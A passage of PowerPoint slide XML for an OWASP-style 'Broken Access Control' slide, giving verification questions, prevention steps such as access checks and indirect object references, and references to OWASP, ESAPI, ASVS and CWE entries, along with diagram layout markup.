              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For non-public </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> requests, does the application ensure the user is authenticated, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has the required roles or privileges to use that function?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code review of the application can verify whether these controls are implemented correctly and are present everywhere they are required. Manual testing is also effective for identifying access control flaws. Automated tools typically do not look for such flaws because they cannot recognize what requires protection or what is safe or unsafe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Top 10-2007 on Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>10-2007 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Function Level Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="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7"/>
              </a:rPr>
              <a:t>ESAPI Access Reference Map API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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8"/>
              </a:rPr>
              <a:t>ESAPI Access Control API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (See isAuthorizedForData(), isAuthorizedForFile(), isAuthorizedForFunction() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional access control requirements, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId10"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>285 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>on Improper Access Control (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Authorization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="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12"/>
              </a:rPr>
              <a:t>CWE Entry 639 on Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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13"/>
              </a:rPr>
              <a:t>CWE Entry 22 on Path Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(an example of a Direct Object Reference weakness)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing access control flaws requires selecting an approach for protecting each function and each type of data (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e.g., object number, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Each use of a direct reference from an untrusted source must include an access control check to ensure the user is authorized for the requested resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use per user or session indirect object references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. This coding pattern prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> includes both sequential and random access reference maps that developers can use to eliminate direct object references.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated verification. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Leverage automation to verify proper authorization deployment. This is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ften custom.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Broken Access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
